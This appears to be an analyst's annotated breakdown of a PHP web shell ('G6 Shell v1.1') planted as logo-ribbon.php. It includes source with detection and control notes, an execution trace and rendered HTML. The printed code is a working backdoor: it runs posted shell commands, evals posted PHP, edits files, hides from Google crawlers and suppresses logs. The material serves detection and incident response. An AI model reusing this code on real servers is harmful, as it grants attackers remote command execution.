    // Analyst note: "Server Information" route, host reconnaissance. It
    // prints the server port, OS string (php_uname), PHP version and several
    // request headers. Some of the displayed values do not reflect the real
    // configuration, as noted on the lines concerned.
    get_srv_info();
    $s_safemode = ini_get("safe_mode");
    // "=" is an assignment, so this condition is always true and the page
    // always shows Safe Mode as ON regardless of the ini value.
    if ($s_safemode = TRUE) {
        $s_safemode = "<span class='enabled'>[ON";
    } else {
        $s_safemode = "<span class='disabled'>[OFF";
    }
    if (extension_loaded('curl')) {
        $curls = "<span class='enabled'>[ON]</span>";
    } else {
        $curls = "<span class='disabled'>[OFF]</span>";
    }
    echo "<b>Server Port: </b>" . $_SERVER['SERVER_PORT'] . "<br /><br /><b>HTTP Connection: </b>" . $_SERVER['HTTP_CONNECTION'] . "<br /><br /><b>Operating System:</b> " . php_uname() . "<br /><br />";
    // get_magic_quotes_gpc() no longer exists in PHP 8, which dates the
    // runtime this code was written for.
    if (get_magic_quotes_gpc()) {
        echo "<b>Magic Quotes:</b> <span class='enabled'>[ENABLED]</span><br /><br />";
    } else {
        echo "<b>Magic Quotes:</b> <span class='disabled'>[DISABLED]</span><br /><br />";
    }
    echo "<b>PHP Version:</b> " . phpversion() . "<br /><br /><b>Safe Mode: </b>" . $s_safemode . "]</span><br /><br /><b>Curl: </b>" . $curls . "<br /><br /><b>Accept Encoding: </b> " . $_SERVER['HTTP_ACCEPT_ENCODING'] . "<br /><br /><b>Admin: </b>" . $_SERVER['SERVER_ADMIN'] . "<br /><br /><strong>Disabled Functions: </strong>";
    // $disabled is not assigned at this scope in the visible code (the
    // variable of that name inside cmd() is local to it), so "none" is what
    // this prints.
    if (!empty($disabled)) {
        foreach ($disabled as $functionsdis) {
            echo $functionsdis . ", ";
        }
    } else {
        echo "none";
    }
    echo "<br /><br /><strong>/etc/passwd: </strong>";
    // The label says /etc/passwd but the path tested is /home/etc/passwd.
    if (is_readable("/home/etc/passwd")) {
        echo "<span style='color:green;'>Readable</span>";
    } else {
        echo "<span style='color:red;'>Unreadable</span>";
    }
} elseif (strstr($CurrentUrl, "dGVybWlhbmw")) {
    get_srv_info();
    ?>
                <p>Command line execution via exec, passthru or system.</p>
               
                <form action="" method="post"><table><tr><td><b>Command Execution: </b></td><td><input type="text" placeholder="root~$ " autocomplete="off" name="command" class="command"/></td></tr></table>
        <?php 
    // Analyst note: "Terminal" handler, OS command execution. The string in
    // $_POST['command'] is passed to exec(), passthru() or system(), whichever
    // cmd() names, and runs with the privileges of the PHP process. There is no
    // isset() check, so the call is made on every request to this route.
    // What to look for: POST requests whose URL contains "dGVybWlhbmw", and
    // shell or utility processes whose parent is the web server / PHP worker.
    // Control: exec, passthru, system and shell_exec in disable_functions where
    // the hosted application does not need them.
    $out = array();
    if (cmd() == "exec") {
        echo "Using: exec => ";
        // exec() fills $out with the command's output lines.
        exec($_POST['command'], $out);
        foreach ($out as $line) {
            echo "{$line}\n";
        }
    } elseif (cmd() == "passthru") {
        echo "Using: passthru => ";
        passthru($_POST['command'], $out);
        foreach ($out as $line) {
            echo "{$line}\n";
        }
    } elseif (cmd() == "system") {
        echo "Using: system => ";
        system($_POST['command'], $out);
        foreach ($out as $line) {
            echo "{$line}\n";
        }
    }
} elseif (strstr($CurrentUrl, "a253aXN1ZQ")) {
    get_srv_info();
    echo "\r\n                <h4>Information</h4>\r\n                <p>G6 Shell v" . $shellVersion . " Open Beta Edition - coded by Mr. P-teo, below are the known issues and bugs.</p>";
    ?>
                <ul>
                        <li>is_dir function not returning correct result within child dirs of the file browser.</li>
                        <li>File Browser controls, e.g. rename, create file, delete full dir.</li>
                        <li>Editing can run into trouble with GET Method Not Implemented error.</li>
                </ul>
                <br /><br />
        <?php 
} elseif (strstr($CurrentUrl, "?eval")) {
    get_srv_info();
    ?>
        <div style="float:left;width:700px;">
        <h4>Eval (PHP code execution)</h4>
        <form action="" method="post">
                <textarea name="phpeval" style="width:700px;height:190px;padding:5px;background:#CCCCCC;">//Example, get all PHP info about the server
 
echo phpinfo();</textarea><br />
                <input style="padding:4px 10px;margin:10px 0px;" name="evalexecute" value="Execute Code" type="submit"/>
        </form>
        </div>
        <div style="float:right;width:250px;">
                <h4>Information</h4>
                <p>Enter your specified php code within the textarea and wait for the response.</p>
                <p><strong>Example: </strong><i>echo phpinfo();</i></p><br /><br />
                <h4>Warning</h4>
                <p>including external files with seperate stylesheets may affect the apearence of G6 styles.</p>
        </div>
        <?php 
    // Analyst note: "PHP Exec" handler, arbitrary PHP execution. The posted
    // "phpeval" text is handed to eval() unchanged and runs inside this
    // request with the script's full privileges. Because it stays in-process,
    // it need not spawn any child process; the request itself (a POST with
    // "evalexecute" and "phpeval" fields to a URL containing "?eval") is the
    // main observable, which makes request-body logging or a WAF rule on those
    // field names the relevant detection.
    if (isset($_POST['evalexecute'])) {
        eval($_POST['phpeval']);
    }
} elseif (strstr($CurrentUrl, "?srmve")) {
    get_srv_info();
    ?>
        <p>If you are sure you wish to remove the shell click the button below, make sure you are certain as you wil only have one shot at this.</p>
        <form action="" method="post">
                <center><input style="padding:7px 15px;margin:10px 0px;" name="Remove" value="Remove Shell" type="submit"/></center>
        </form>
        <?php 
    // Analyst note: "Self Remove" handler. On POST "Remove" it deletes one
    // hard-coded path.
    // NOTE(review): the path shown here looks like the analysis sandbox's
    // stored copy of the sample, presumably substituted for a self-reference
    // during deobfuscation; confirm against the original file.
    // For responders: a shell that can delete itself means its absence from
    // disk does not rule out earlier use. Access logs and backups are the
    // evidence to preserve.
    if (isset($_POST['Remove'])) {
        if (file_exists("/var/www/html/logo-ribbon.php.34a98aed4a59287576f8414d78440682.bin")) {
            unlink("/var/www/html/logo-ribbon.php.34a98aed4a59287576f8414d78440682.bin");
        }
    }
} else {
    get_srv_info();
    ?>
        <br /><br /><br /><br /><div class='Logo'>G6 v<?php 
    echo $shellVersion;
    ?></div><div class='logotext'>Private Shell Coded By Mr. P-teo</div><br /><br /><br />
        <?php 
}
ob_flush();
?>
</div>
<body>
</html>

Execution traces

data/traces/1270c73f8ecb757a9381d68712b23913_trace-1676237601.8891.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 19:33:47.786978]
1	0	1	0.000168	393576
1	3	0	0.000782	505816	{main}	1		/var/www/html/uploads/logo-ribbon.php	0	0
2	4	0	0.000804	505816	ob_start	0		/var/www/html/uploads/logo-ribbon.php	38	0
2	4	1	0.000819	522328
2	4	R			TRUE
2	5	0	0.000833	522328	ini_set	0		/var/www/html/uploads/logo-ribbon.php	39	2	'display_errors'	FALSE
2	5	1	0.000849	522400
2	5	R			''
2	6	0	0.000862	522328	ini_set	0		/var/www/html/uploads/logo-ribbon.php	40	2	'memory_limit'	'-1'
2	6	1	0.000880	522432
2	6	R			'128M'
2	7	0	0.000894	522328	strpos	0		/var/www/html/uploads/logo-ribbon.php	42	2	'python-requests/2.25.1'	'Google'
2	7	1	0.000976	522400
2	7	R			FALSE
2	8	0	0.000994	522328	ini_set	0		/var/www/html/uploads/logo-ribbon.php	44	2	'error_log'	NULL
2	8	1	0.001010	522400
2	8	R			''
2	9	0	0.001023	522328	ini_set	0		/var/www/html/uploads/logo-ribbon.php	45	2	'log_errors'	0
2	9	1	0.001037	522400
2	9	R			'1'
2	10	0	0.001050	522328	ini_set	0		/var/www/html/uploads/logo-ribbon.php	46	2	'max_execution_time'	0
2	10	1	0.001065	522432
2	10	R			'30'
1		A						/var/www/html/uploads/logo-ribbon.php	63	$shellVersion = '1.1'
1		A						/var/www/html/uploads/logo-ribbon.php	65	$upload = NULL
1		A						/var/www/html/uploads/logo-ribbon.php	66	$downloadfilename = NULL
1		A						/var/www/html/uploads/logo-ribbon.php	67	$delete = NULL
1		A						/var/www/html/uploads/logo-ribbon.php	68	$file_explorer = NULL
1		A						/var/www/html/uploads/logo-ribbon.php	69	$mkdir = NULL
1		A						/var/www/html/uploads/logo-ribbon.php	70	$currentDirectoryFileDl = NULL
2	11	0	0.001175	523400	dirname	0		/var/www/html/uploads/logo-ribbon.php	82	1	'/var/www/html/uploads/logo-ribbon.php'
2	11	1	0.001189	523496
2	11	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/logo-ribbon.php	73	$NavLinks = [0 => ['name' => 'Main', 'url' => '?'], 1 => ['name' => 'Server Information', 'url' => '?c3J2aW5mbw='], 2 => ['name' => 'File Explorer', 'url' => '?ZmlsZV9leHBsb3Jlcg=/var/www/html/uploads/'], 3 => ['name' => 'Terminal', 'url' => '?dGVybWlhbmw'], 4 => ['name' => 'Hash Identifier', 'url' => '?aGk='], 5 => ['name' => 'PHP Exec', 'url' => '?eval'], 6 => ['name' => 'Back Connect', 'url' => '?YmNrbmV0='], 7 => ['name' => 'Mass Mailer', 'url' => '?kueqymass'], 8 => ['name' => 'Shell-101', 'url' => '?a253aXN1ZQ'], 9 => ['name' => 'Self Remove', 'url' => '?srmve']]
1		A						/var/www/html/uploads/logo-ribbon.php	113	$CurrentUrl = 'http://localhost/uploads/logo-ribbon.php'
1		A						/var/www/html/uploads/logo-ribbon.php	114	$last = 9
1		A						/var/www/html/uploads/logo-ribbon.php	115	$NavLink = 0
1		A						/var/www/html/uploads/logo-ribbon.php	116	$linknames = TRUE
1		A						/var/www/html/uploads/logo-ribbon.php	117	$linkurls = FALSE
1		A						/var/www/html/uploads/logo-ribbon.php	115	$NavLink = 1
1		A						/var/www/html/uploads/logo-ribbon.php	116	$linknames = FALSE
1		A						/var/www/html/uploads/logo-ribbon.php	117	$linkurls = FALSE
1		A						/var/www/html/uploads/logo-ribbon.php	115	$NavLink = 2
1		A						/var/www/html/uploads/logo-ribbon.php	116	$linknames = FALSE
1		A						/var/www/html/uploads/logo-ribbon.php	117	$linkurls = FALSE
1		A						/var/www/html/uploads/logo-ribbon.php	115	$NavLink = 3
1		A						/var/www/html/uploads/logo-ribbon.php	116	$linknames = FALSE
1		A						/var/www/html/uploads/logo-ribbon.php	117	$linkurls = FALSE
1		A						/var/www/html/uploads/logo-ribbon.php	115	$NavLink = 4
1		A						/var/www/html/uploads/logo-ribbon.php	116	$linknames = FALSE
1		A						/var/www/html/uploads/logo-ribbon.php	117	$linkurls = FALSE
1		A						/var/www/html/uploads/logo-ribbon.php	115	$NavLink = 5
1		A						/var/www/html/uploads/logo-ribbon.php	116	$linknames = FALSE
1		A						/var/www/html/uploads/logo-ribbon.php	117	$linkurls = FALSE
1		A						/var/www/html/uploads/logo-ribbon.php	115	$NavLink = 6
1		A						/var/www/html/uploads/logo-ribbon.php	116	$linknames = FALSE
1		A						/var/www/html/uploads/logo-ribbon.php	117	$linkurls = FALSE
1		A						/var/www/html/uploads/logo-ribbon.php	115	$NavLink = 7
1		A						/var/www/html/uploads/logo-ribbon.php	116	$linknames = FALSE
1		A						/var/www/html/uploads/logo-ribbon.php	117	$linkurls = FALSE
1		A						/var/www/html/uploads/logo-ribbon.php	115	$NavLink = 8
1		A						/var/www/html/uploads/logo-ribbon.php	116	$linknames = FALSE
1		A						/var/www/html/uploads/logo-ribbon.php	117	$linkurls = FALSE
1		A						/var/www/html/uploads/logo-ribbon.php	115	$NavLink = 9
1		A						/var/www/html/uploads/logo-ribbon.php	116	$linknames = FALSE
1		A						/var/www/html/uploads/logo-ribbon.php	117	$linkurls = TRUE
2	12	0	0.001533	523560	strstr	0		/var/www/html/uploads/logo-ribbon.php	120	2	'http://localhost/uploads/logo-ribbon.php'	'readfile'
2	12	1	0.001548	523632
2	12	R			FALSE
2	13	0	0.001561	523560	strstr	0		/var/www/html/uploads/logo-ribbon.php	139	2	'http://localhost/uploads/logo-ribbon.php'	'aGk'
2	13	1	0.001576	523632
2	13	R			FALSE
2	14	0	0.001588	523560	strstr	0		/var/www/html/uploads/logo-ribbon.php	204	2	'http://localhost/uploads/logo-ribbon.php'	'YmNrbmV0'
2	14	1	0.001603	523632
2	14	R			FALSE
2	15	0	0.001615	523560	strstr	0		/var/www/html/uploads/logo-ribbon.php	229	2	'http://localhost/uploads/logo-ribbon.php'	'bWtmbA'
2	15	1	0.001629	523632
2	15	R			FALSE
2	16	0	0.001641	523560	strstr	0		/var/www/html/uploads/logo-ribbon.php	235	2	'http://localhost/uploads/logo-ribbon.php'	'bWtkaXI'
2	16	1	0.001655	523632
2	16	R			FALSE
2	17	0	0.001667	523560	strstr	0		/var/www/html/uploads/logo-ribbon.php	250	2	'http://localhost/uploads/logo-ribbon.php'	'ZmlsZV9leHBsb3Jlcg'
2	17	1	0.001682	523632
2	17	R			FALSE
2	18	0	0.001695	523560	strstr	0		/var/www/html/uploads/logo-ribbon.php	356	2	'http://localhost/uploads/logo-ribbon.php'	'downlfile'
2	18	1	0.001709	523632
2	18	R			FALSE
2	19	0	0.001721	523560	strstr	0		/var/www/html/uploads/logo-ribbon.php	400	2	'http://localhost/uploads/logo-ribbon.php'	'kueqymass'
2	19	1	0.001735	523632
2	19	R			FALSE
2	20	0	0.001747	523560	strstr	0		/var/www/html/uploads/logo-ribbon.php	409	2	'http://localhost/uploads/logo-ribbon.php'	'delete'
2	20	1	0.001761	523632
2	20	R			FALSE
2	21	0	0.001773	523560	strstr	0		/var/www/html/uploads/logo-ribbon.php	412	2	'http://localhost/uploads/logo-ribbon.php'	'c3J2aW5mbw'
2	21	1	0.001787	523632
2	21	R			FALSE
2	22	0	0.001799	523560	strstr	0		/var/www/html/uploads/logo-ribbon.php	433	2	'http://localhost/uploads/logo-ribbon.php'	'dGVybWlhbmw'
2	22	1	0.001813	523632
2	22	R			FALSE
2	23	0	0.001825	523560	strstr	0		/var/www/html/uploads/logo-ribbon.php	462	2	'http://localhost/uploads/logo-ribbon.php'	'a253aXN1ZQ'
2	23	1	0.001839	523632
2	23	R			FALSE
2	24	0	0.001851	523560	strstr	0		/var/www/html/uploads/logo-ribbon.php	476	2	'http://localhost/uploads/logo-ribbon.php'	'?eval'
2	24	1	0.001865	523632
2	24	R			FALSE
2	25	0	0.001877	523560	strstr	0		/var/www/html/uploads/logo-ribbon.php	499	2	'http://localhost/uploads/logo-ribbon.php'	'?srmve'
2	25	1	0.001890	523632
2	25	R			FALSE
2	26	0	0.001903	523560	get_srv_info	1		/var/www/html/uploads/logo-ribbon.php	513	0
2	26	1	0.001917	523560
2	27	0	0.001924	523560	ob_flush	0		/var/www/html/uploads/logo-ribbon.php	519	0
2	27	1	0.001942	523672
2	27	R			TRUE
1	3	1	0.001957	523672
			0.001991	342448
TRACE END   [2023-02-12 19:33:47.788836]


Generated HTML code

<html><head><style stype="text/css">
.flink{font-weight:normal;}
body{background-color:#101010;  background:#101010;color:#f2f2f2;font-family:tahoma;font-size:12px;}
body a{ color:#3467BA;font-weight:bold;text-decoration:none;}
body a:hover{text-decoration:underline;}
#main_content{border:1px solid #5C7296;overflow:hidden;width:1000px;height:auto;padding:15px;margin: 0 auto;background:#0A0A0A;border-radius:6px;-moz-border-radius:6px;-webkit-border-radius:6px;}
.enabled{color:#7ACC29;}
.enabled a{color:#7ACC29;font-weight:normal;}
.disabled{color:#CC0000;}
.execbox{width:250px;padding: 5px 15px 15px 15px;height:auto;border:solid 1px #47A3FF;background:#0A0A0A;}
.viewsource{border:solid 1px #47A3FF;background:#0A0A0A;color:#f2f2f2;}
.command{width:620px;border:solid 1px #47A3FF;outline:none;background:#0A0A0A;color:#f2f2f2;}
.response{width:616px;color:green;height:300px;border-bottom:solid 1px #47A3FF;border-right:solid 1px #47A3FF;border-left:solid 1px #47A3FF;border-top:0;outline:none;background:#0A0A0A;color:#f2f2f2;margin:-4px 0px 0px 0px;}
.TableHeader_Name{width:450px;padding:0px 0px 0px 5px;height:25px;font-weight:bold;font-family:verdana;background-color:#282828;border-top-left-radius:4px;-moz-border-top-left-radius:4px;-webkit-border-top-left-radius:4px;}
.TableHeader{width:100px;height:25px;font-weight:bold;font-family:verdana;text-align:center;background-color:#282828;}
.TableHeaderoptions{padding:0px 0px 0px 15px;width:170px;height:25px;font-weight:bold;font-family:verdana;background-color:#282828;border-top-right-radius:4px;-moz-border-top-right-radius:4px;-webkit-border-top-right-radius:4px;}
.filesize{color:green;text-align:center;}
.filenames a{font-weight:normal;text-decoration:none;}
.filenames a:hover{text-decoration:underline;}
tr{background-color: #080808;}
tr:hover{background-color:#282828;}
#options{font-weight:200;font-family:tahoma;margin-left:10px;display:block;}
#title{font-size:25px;font-weight:bold;font-family:arial;display:block;padding:15px 0px 0px 0px;}
.Logo{font-size:150px;text-align:center;color:#101010;}
.logotext{font-size:20px;text-align:center;color:#101010;}
.terminaltop{background-color:#686868;margin:-10px 0px -3px 0px;width:622px;height:20px;border-top-right-radius:5px;-moz-border-top-right-radius:5px;-webkit-border-top-right-radius:5px;border-top-left-radius:5px;-moz-border-top-left-radius:5px;-webkit-border-top-left-radius:5px;}
.TableHeaderoptions2{padding:0px 0px 0px 15px;width:170px;height:25px;font-weight:bold;font-family:verdana;background-color:#282828;border-top-right-radius:4px;-moz-border-top-right-radius:4px;-webkit-border-top-right-radius:4px;}
.box{padding:10px;background-color:#292929;border:1px solid #3467BA;height:auto;width:970;border-radius:6px;-moz-border-radius:6px;-webkit-border-radius:6px;}
.box2{padding:5px;background-color:#000000;height:auto;width:970;border-radius:6px;-moz-border-radius:6px;-webkit-border-radius:6px;}
.optionstr td{background-color:#0A0A0A;}
.optionstr td:hover{background-color:#0A0A0A;}
.chdir{background-color:#010101;color:#f2f2f2;border:1px solid #3467BA;outline:none;font-size:11px;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;padding:2px 3px;margin:0 0 0 -1px;}
.godir{margin:0px 10px 0px -5px;background-color:#292929;color:#f2f2f2;border:1px solid #3467BA;outline:none;font-size:11px;width:24px;border-top-right-radius:4px;-moz-border-top-right-radius:4px;-webkit-border-top-right-radius:4px;border-bottom-right-radius:4px;-moz-border-bottom-right-radius:4px;-webkit-border-bottom-right-radius:4px;}
</style>
</head><body>
        <div id="main_content">
<title>G6 Shell v1.1 - Private .::Made By Mr. P-teo::.</title><a href="?">Main</a> / <a href="?c3J2aW5mbw=">Server Information</a> / <a href="?ZmlsZV9leHBsb3Jlcg=/var/www/html/">File Explorer</a> / <a href="?dGVybWlhbmw">Terminal</a> / <a href="?aGk=">Hash Identifier</a> / <a href="?eval">PHP Exec</a> / <a href="?YmNrbmV0=">Back Connect</a> / <a href="?kueqymass">Mass Mailer</a> / <a href="?a253aXN1ZQ">Shell-101</a> / <a href="?srmve">Self Remove</a> / <br><span id="title">G6 Shell v1.1 - Private</span><br><div class="box"><b>Server Name: </b>localhost<br>
        <b>Server IP: </b>::1 <span class="enabled"><a href="http://www.who.is/whois/localhost" target="_blank">[WHOIS]</a> - <a href="http://www.dnsstuff.com/tools?runFromMain=::1&amp;toolType=traceroute" target="_blank">[TRACEROUTE]</a></span><br><b>Shell Location: </b>/var/www/html/logo-ribbon.php<br>
        <b>Server Software: </b>Apache/2.4.52 (Ubuntu) <span class="enabled"><a href="http://www.exploit-db.com/search/?action=search&amp;filter_page=1&amp;filter_description=Apache/2.4.52 (Ubuntu)&amp;filter_exploit_text=&amp;filter_author=&amp;filter_platform=0&amp;filter_type=0&amp;filter_lang_id=0&amp;filter_port=&amp;filter_osvdb=&amp;filter_cve=" target="_blank">[Exploit DB]</a></span><br>
        </div><br><br><p></p>        <br><br><br><br><div class="Logo">G6 v1.1</div><div class="logotext">Private Shell Coded By Mr. P-teo</div><br><br><br>
        </div>

</body></html>

Original PHP code

<style stype="text/css">
.flink{font-weight:normal;}
body{background-color:#101010;  background:#101010;color:#f2f2f2;font-family:tahoma;font-size:12px;}
body a{ color:#3467BA;font-weight:bold;text-decoration:none;}
body a:hover{text-decoration:underline;}
#main_content{border:1px solid #5C7296;overflow:hidden;width:1000px;height:auto;padding:15px;margin: 0 auto;background:#0A0A0A;border-radius:6px;-moz-border-radius:6px;-webkit-border-radius:6px;}
.enabled{color:#7ACC29;}
.enabled a{color:#7ACC29;font-weight:normal;}
.disabled{color:#CC0000;}
.execbox{width:250px;padding: 5px 15px 15px 15px;height:auto;border:solid 1px #47A3FF;background:#0A0A0A;}
.viewsource{border:solid 1px #47A3FF;background:#0A0A0A;color:#f2f2f2;}
.command{width:620px;border:solid 1px #47A3FF;outline:none;background:#0A0A0A;color:#f2f2f2;}
.response{width:616px;color:green;height:300px;border-bottom:solid 1px #47A3FF;border-right:solid 1px #47A3FF;border-left:solid 1px #47A3FF;border-top:0;outline:none;background:#0A0A0A;color:#f2f2f2;margin:-4px 0px 0px 0px;}
.TableHeader_Name{width:450px;padding:0px 0px 0px 5px;height:25px;font-weight:bold;font-family:verdana;background-color:#282828;border-top-left-radius:4px;-moz-border-top-left-radius:4px;-webkit-border-top-left-radius:4px;}
.TableHeader{width:100px;height:25px;font-weight:bold;font-family:verdana;text-align:center;background-color:#282828;}
.TableHeaderoptions{padding:0px 0px 0px 15px;width:170px;height:25px;font-weight:bold;font-family:verdana;background-color:#282828;border-top-right-radius:4px;-moz-border-top-right-radius:4px;-webkit-border-top-right-radius:4px;}
.filesize{color:green;text-align:center;}
.filenames a{font-weight:normal;text-decoration:none;}
.filenames a:hover{text-decoration:underline;}
tr{background-color: #080808;}
tr:hover{background-color:#282828;}
#options{font-weight:200;font-family:tahoma;margin-left:10px;display:block;}
#title{font-size:25px;font-weight:bold;font-family:arial;display:block;padding:15px 0px 0px 0px;}
.Logo{font-size:150px;text-align:center;color:#101010;}
.logotext{font-size:20px;text-align:center;color:#101010;}
.terminaltop{background-color:#686868;margin:-10px 0px -3px 0px;width:622px;height:20px;border-top-right-radius:5px;-moz-border-top-right-radius:5px;-webkit-border-top-right-radius:5px;border-top-left-radius:5px;-moz-border-top-left-radius:5px;-webkit-border-top-left-radius:5px;}
.TableHeaderoptions2{padding:0px 0px 0px 15px;width:170px;height:25px;font-weight:bold;font-family:verdana;background-color:#282828;border-top-right-radius:4px;-moz-border-top-right-radius:4px;-webkit-border-top-right-radius:4px;}
.box{padding:10px;background-color:#292929;border:1px solid #3467BA;height:auto;width:970;border-radius:6px;-moz-border-radius:6px;-webkit-border-radius:6px;}
.box2{padding:5px;background-color:#000000;height:auto;width:970;border-radius:6px;-moz-border-radius:6px;-webkit-border-radius:6px;}
.optionstr td{background-color:#0A0A0A;}
.optionstr td:hover{background-color:#0A0A0A;}
.chdir{background-color:#010101;color:#f2f2f2;border:1px solid #3467BA;outline:none;font-size:11px;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;padding:2px 3px;margin:0 0 0 -1px;}
.godir{margin:0px 10px 0px -5px;background-color:#292929;color:#f2f2f2;border:1px solid #3467BA;outline:none;font-size:11px;width:24px;border-top-right-radius:4px;-moz-border-top-right-radius:4px;-webkit-border-top-right-radius:4px;border-bottom-right-radius:4px;-moz-border-bottom-right-radius:4px;-webkit-border-bottom-right-radius:4px;}
</style>
<body>
        <div id="main_content">
<?php
// Analyst note: start-up section of the web shell. Output is buffered and several
// PHP runtime settings are overridden for this request via ini_set().
ob_start();
// Errors are not rendered into the page.
ini_set('display_errors', false);
// '-1' removes the per-request memory limit (the recorded trace shows the previous value was '128M').
ini_set('memory_limit', '-1');
 
// Cloaking: a request whose User-Agent contains 'Google' receives a 404 and the script exits,
// presumably so that crawlers do not index the shell. Any other client gets the full interface.
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) { header('HTTP/1.0 404 Not Found'); exit; }
 
// Log suppression: error_log is cleared and log_errors is switched off, so PHP errors raised
// by this script are not written to the error log; '@' also hides failures of these calls.
// A script in an upload directory that changes these settings at run time is a useful triage signal.
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
// 0 removes the execution-time limit (the recorded trace shows the previous value was '30').
@ini_set('max_execution_time',0);
// Fixed page title; the literal text can be matched in file or response content scanning.
echo "<title>G6 Shell v1.1 - Private .::Made By Mr. P-teo::.</title>";
 
/**
 * Prints the banner shown at the top of the shell's pages: server name, server IP,
 * the script's own path and the web-server software string, all read from $_SERVER.
 *
 * Analyst notes:
 *  - Every value is concatenated into the HTML without escaping; HTTP_HOST comes from the request.
 *  - The banner contains plain links (target='_blank') to who.is, a dnsstuff.com traceroute tool
 *    and an exploit-db.com search pre-filled with SERVER_SOFTWARE. The function itself makes no
 *    outbound request; it only echoes the markup.
 *  - The literals "G6 Shell v1.1 - Private" and "Shell Location:" are fixed text in this sample
 *    and can serve as content-match strings.
 *
 * Takes no arguments and returns nothing; all output goes through echo.
 */
function get_srv_info(){
 
        echo "<br /><span id='title'>G6 Shell v1.1 - Private</span><br /><div class='box'><b>Server Name: </b>".$_SERVER["SERVER_NAME"]."<br />
        <b>Server IP: </b>".$_SERVER["SERVER_ADDR"]." <span class='enabled'><a href='http://www.who.is/whois/".$_SERVER['HTTP_HOST']."' target='_blank'>[WHOIS]</a> - <a href='http://www.dnsstuff.com/tools?runFromMain=".$_SERVER["SERVER_ADDR"]."&toolType=traceroute' target='_blank'>[TRACEROUTE]</a></span><br />".
        "<b>Shell Location: </b>".$_SERVER["SCRIPT_FILENAME"]."<br />
        <b>Server Software: </b>".$_SERVER["SERVER_SOFTWARE"]." <span class='enabled'><a href='http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=".$_SERVER['SERVER_SOFTWARE']."&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=' target='_blank'>[Exploit DB]</a></span><br />
        </div><br /><br /><p></p>";
}
 
/**
 * Returns the name of a command-execution function ("exec", "passthru" or "system"),
 * or "none", after consulting the disable_functions ini value.
 *
 * Analyst notes:
 *  - The loop iterates $diabled, which this function never assigns (the split list is in
 *    $disabled), so $diabledLower stays empty.
 *  - in_array() is called with the array first and the function name second, the reverse of
 *    PHP's (needle, haystack) order.
 *  - As written, the result therefore does not reflect the server's disable_functions setting.
 *  - No call to cmd() appears in the visible part of this listing or in the recorded trace.
 */
function cmd(){
        // Split the comma-separated disable_functions value into a list.
        $disabled = explode(', ', ini_get('disable_functions'));
        $diabledLower = array();
        // Reads $diabled (undefined here), not $disabled.
        foreach($diabled as $function){$diabledLower[] = strtolower($function);}
        // First name that the check does not flag is returned; "none" if all three are flagged.
        if(!in_array($diabledLower, "exec")){return "exec";     }elseif(!in_array($diabledLower, "passthru")){return "passthru";}elseif(!in_array($diabledLower, "system")){return "system";}else{return "none";}}
        // Analyst note: version string of this sample.
        $shellVersion = "1.1";
 
// Request parameters, read without isset() or validation (the recorded trace shows NULL when absent).
// The obfuscated keys are unpadded Base64 of plain words:
//   dXBsb2Fk = "upload", ZG93bg = "down", ZmlsZV9leHBsb3Jlcg = "file_explorer", bWtkaXI = "mkdir".
$upload = $_GET['dXBsb2Fk'];
$downloadfilename = $_GET['ZG93bg'];
$delete = $_GET['delete'];
$file_explorer = $_GET['ZmlsZV9leHBsb3Jlcg'];
$mkdir = $_GET['bWtkaXI'];
$currentDirectoryFileDl = $_GET['downlfile'];
// Navigation menu: one entry per feature, each selected by a query-string token.
// Several tokens are unpadded Base64: c3J2aW5mbw = "srvinfo", dGVybWlhbmw = "termianl" (sic),
// aGk = "hi", YmNrbmV0 = "bcknet", a253aXN1ZQ = "knwisue". Together with "eval", "kueqymass"
// and "srmve" these literals are candidate strings for web-access-log review.
$NavLinks = array(
        array(
                "name" => "Main",
                "url" => "?"
        ),
        array(
                "name" => "Server Information",
                "url" => "?c3J2aW5mbw="
        ),
        array(
                // The explorer link starts in the directory that holds the shell itself.
                "name" => "File Explorer",
                "url" => "?ZmlsZV9leHBsb3Jlcg=".dirname(__FILE__)."/"
        ),
        array(
                "name" => "Terminal",
                "url" => "?dGVybWlhbmw"
        ),
        array(
                "name" => "Hash Identifier",
                "url" => "?aGk="
        ),
        array(
                "name" => "PHP Exec",
                "url" => "?eval"
        ),
        array(
                "name" => "Back Connect",
                "url" => "?YmNrbmV0="
        ),
        array(
                "name" => "Mass Mailer",
                "url" => "?kueqymass"
        ),
        array(
                "name" => "Shell-101",
                "url" => "?a253aXN1ZQ"
        ),
        array(
                "name" => "Self Remove",
                "url" => "?srmve"
        )
);
// Rebuilt from the request's Host header and URI. The dispatch chain that follows selects a
// feature by substring-searching this URL with strstr(), so a token matches anywhere in the URL.
$CurrentUrl = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
$last = count($NavLinks) - 1;
// Emit the menu as "name / name / ..." links.
foreach($NavLinks as $NavLink => $NavRow){
        // $linknames and $linkurls are recomputed on every pass but not read inside this loop.
        $linknames = ($NavLink == 0);
    $linkurls = ($NavLink == $last);
        echo '<a href="'.$NavRow['url'].'">'.$NavRow['name'].'</a> / ';
}
if(strstr($CurrentUrl, "readfile")){
                $sourcefile = $_REQUEST['readfile'];
                if(is_file($sourcefile)){
        get_srv_info();
        if(isset($sourcefile))
        {
            $Finalsource = file_get_contents($sourcefile);             
 
                echo "<strong>Editing: </strong>".$sourcefile."<br /><br /><a href='".$_SERVER['HTTP_REFERER']."'>&laquo; Back to files</a><br /><form action='' method='POST'><textarea name='sourcecode' class='viewsource' rows='20' cols='121'>".htmlentities($Finalsource)."</textarea><br /><input type='Submit' value='Save File' name='save' /></form>";
                }
                }else{
                        echo "Data not sent.";
                }
                if(isset($_POST['save'])){
                        $new_source = $_POST['sourcecode'];
                        $source_edit = fopen($sourcefile, 'w');
                        fwrite($source_edit, $new_source);
                        fclose($source_edit);
                }
}elseif(strstr($CurrentUrl, "aGk")){
        get_srv_info();
        echo "<p>G6 hash identifier is able to identify MD5, SHA-1, MySQL5, DES(Unix), SHA-256, SHA-384, SHA-512, MD5(Unix), MD5(APR), MD5(phpBB3), MD5(Wordpress), SHA-256(Unix), SHA-512(Unix) and MD5(Base-64).</p>";
        if(isset($_POST['gethash'])){
                $hash = $_POST['hash'];
